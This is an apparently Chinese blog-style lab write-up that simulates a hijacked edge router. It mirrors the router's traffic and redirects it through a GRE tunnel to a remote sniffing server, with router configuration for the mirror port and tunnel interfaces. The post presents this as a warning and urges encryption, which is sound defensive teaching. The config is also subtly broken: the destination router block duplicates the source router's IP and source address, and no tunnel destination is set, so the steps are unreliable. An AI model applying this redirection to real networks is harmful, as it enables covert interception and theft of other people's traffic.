一般情况下,企业或组织的出口路由器往往部署在防火墙以外,缺乏安全保护,所以很容易失控。而一旦边界路由器被入侵,则很可能被用来进行流量重定向,导致数据失泄密风险。
这篇文档中,我利用模拟器构建了一个实验环境,模拟了某台路由器被入侵后,导致进出网络流量被重定向的情况。
一、实验环境
如图所示,网络A的主机访问目标主机B,由于出口路由器被入侵,导致所有数据被镜像后重定向到目标路由器,并最终被发送到监听服务器。
测试拓扑图
二、配置思路
- 首先在出口路由器上设置镜像口,复制指定的、感兴趣的、甚至是所有的进出口流量;
- 通过GRE的tunnel隧道技术,在网络层添加一个IP头,从而实现流量想重定向到哪里,就重定向到哪里的目标;
- 在目标路由器下,挂接监听服务器。
三、具体配置
第一步:配置镜像口
# 设置远程监听服务器(192.168.3.2)
observe-server destination-ip 192.168.3.2 source-ip 192.168.1.1
# 选择监听端口
interface GigabitEthernet0/0/0
ip address 192.168.1.1 255.255.255.0
mirror to observe-server inbound
第二步:设置Gre隧道
[SrcRouter]
# 10.1.1.1为源路由器隧道IP, 10.1.1.2为目标路由器隧道IP
# 192.168.12.1为源路由器互联口IP,192.168.12.2为目标路由器互联口IP
interface Tunnel0/0/1
description 192.168.12.2
ip address 10.1.1.1 255.255.255.0
tunnel-protocol gre
source 192.168.12.1
[DstRouter]
interface Tunnel0/0/1
description 192.168.12.2
ip address 10.1.1.1 255.255.255.0
tunnel-protocol gre
source 192.168.12.1
第三步:那就非常简单了,开启监听服务器的网口混杂模式,Sniff走起吧。
四、结论
一旦数据丢失了,很容易暴露内部网络和数据通联情况。所以网络运维必须高度重视数据安全问题,特别是网络中的重要数据和隐私流量,一定要加密处理。
网友评论